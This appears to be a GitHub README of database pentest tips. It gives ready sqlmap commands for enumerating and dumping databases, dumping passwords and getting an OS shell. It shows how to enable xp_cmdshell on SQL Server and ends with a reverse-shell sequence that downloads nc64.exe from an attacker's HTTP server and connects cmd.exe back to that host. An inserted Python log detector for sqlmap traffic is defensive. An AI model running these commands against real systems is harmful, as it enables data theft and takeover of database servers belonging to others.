Kiosec/Database-Exploitation
Database-Exploitation

SQLMAP

➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle


➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs


➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables


➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns


➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01,COLUMN02,...} --dump


➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami


➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords
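The sqlmap runs above leave recognisable traces in the web server's access log: sqlmap's default User-Agent and a burst of requests against the same parameter carrying quote/boolean, UNION or time-delay payloads. As an added example (not part of this repository), the Python below parses constructed combined-format log lines (not real traffic) and flags both indicators per request and per source IP.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx combined format), not real traffic.
# The first three mimic an automated injection scan of the "id" parameter targeted by the
# sqlmap commands above; the last is an ordinary request that must not be flagged.
SAMPLE_LOG = r"""
10.0.0.50 - - [01/Jan/2024:10:00:00 +0000] "GET /test?id=1&Submit=Submit HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.50 - - [01/Jan/2024:10:00:01 +0000] "GET /test?id=1%27%20AND%201%3D1--%20&Submit=Submit HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.50 - - [01/Jan/2024:10:00:02 +0000] "GET /test?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /test?id=2&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".strip().splitlines()

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Indicators of SQL injection probing, matched against the URL-decoded parameter value.
SQLI_RE = re.compile(
    r"""('|")\s*(and|or)\b|\bunion\b.*\bselect\b|--\s*$|\bsleep\(|\bwaitfor\b|\bbenchmark\(""",
    re.I,
)

def analyze_line(line):
    """Return {"ip", "path", "reasons"} for a parsable line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # parse_qs URL-decodes the values
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):  # sqlmap's default User-Agent string
        reasons.append("sqlmap user-agent")
    for name, values in params.items():
        if any(SQLI_RE.search(v) for v in values):
            reasons.append(f"sqli payload in '{name}'")
    return {"ip": m["ip"], "path": url.path, "reasons": reasons}

def detect(lines):
    """All flagged requests, in log order."""
    return [f for f in map(analyze_line, lines) if f and f["reasons"]]

def suspicious_sources(lines, threshold=2):
    """Source IPs with at least `threshold` flagged requests: a burst of probes from one host."""
    counts = Counter(f["ip"] for f in detect(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

A scanner that sets a browser-like User-Agent still trips the payload check, which is why both signals are combined and rolled up per source IP.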

SQSH - Connect to a database

sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb

Activate xp_cmdshell

Error: "SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go

Execute commands through xp_cmdshell

1> xp_cmdshell 'whoami'
2> go

Reverse shell through xp_cmdshell

➤ Create a netcat listener
nc -lvp 443

➤ Host the reverse shell binary (here nc64.exe) on an HTTP server
python3 -m http.server

➤ On the database, upload the file from the http server
1> exec xp_cmdshell "powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe"
2> go

➤ Execute the script
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go

About

Pentest tips on databases